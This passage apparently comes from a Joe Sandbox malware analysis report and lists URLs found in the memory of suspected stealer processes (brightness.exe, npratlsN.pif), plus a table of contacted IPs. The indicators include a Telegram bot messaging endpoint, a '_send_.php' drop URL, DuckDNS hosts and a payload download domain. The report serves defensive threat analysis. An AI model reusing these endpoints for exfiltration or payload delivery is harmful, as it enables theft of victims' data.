                                                                        http://checkip.dyndns.org/qnpratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enDzY#npratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://chrome.google.com/webstore?hl=enlBnpratlsN.pif, 00000008.00000002.3076785533.0000000028C29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://crl.verisign.PnpratlsN.pif, 0000000E.00000002.3095136706.00000000368D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://e6.o.lencr.org0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616339150.0000000023771000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenpratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://x1.i.lencr.ornpratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.pmail.com0brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.org/xml/npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.office.com/npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://sectigo.com/CPS0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.iconpratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://checkip.dyndns.orgnpratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.ecosia.org/newtab/npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://amazonenviro.com/brightness.exe, 00000004.00000002.1853607956.000000000088D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://aborters.duckdns.org:8081npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://mail.irco.com.sanpratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://amazonenviro.com/245_Nsltarpncon4brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://e6.i.lencr.org/0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616339150.0000000023771000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://51.38.247.67:8081/_send_.php?LnpratlsN.pif, 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anotherarmy.dns.army:8081npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://reallyfreegeoip.org/xml/8.46.123.189$npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.000000002095E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://reallyfreegeoip.orgnpratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.verisign.npratlsN.pif, 0000000E.00000002.3095136706.00000000368D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://x1.c.lencnpratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://chrome.google.com/webstore?hl=enLznpratlsN.pif, 00000008.00000002.3076785533.0000000028C2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesnpratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.office.com/LznpratlsN.pif, 00000008.00000002.3076785533.0000000028C5F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ocsp.sectigo.com0Cbrightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodednpratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high

                                                                                                                                World Map of Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public IPs

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                166.62.27.188
                                                                                                                                		amazonenviro.comUnited States
                                                                                                                                		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                158.101.44.242
                                                                                                                                		checkip.dyndns.comUnited States
                                                                                                                                		31898ORACLE-BMC-31898USfalse
                                                                                                                                149.154.167.220
                                                                                                                                		api.telegram.orgUnited Kingdom
                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                46.151.208.21
                                                                                                                                		mail.irco.com.saSaudi Arabia
                                                                                                                                		51975NASHIRNET-ASNNASHIRNETASNSAtrue
                                                                                                                                188.114.97.3
                                                                                                                                		unknownEuropean Union
                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                188.114.96.3
                                                                                                                                		reallyfreegeoip.orgEuropean Union
                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                147.124.216.113
                                                                                                                                		unknownUnited States
                                                                                                                                		1432AC-AS-1USfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox version:41.0.0 Charoite
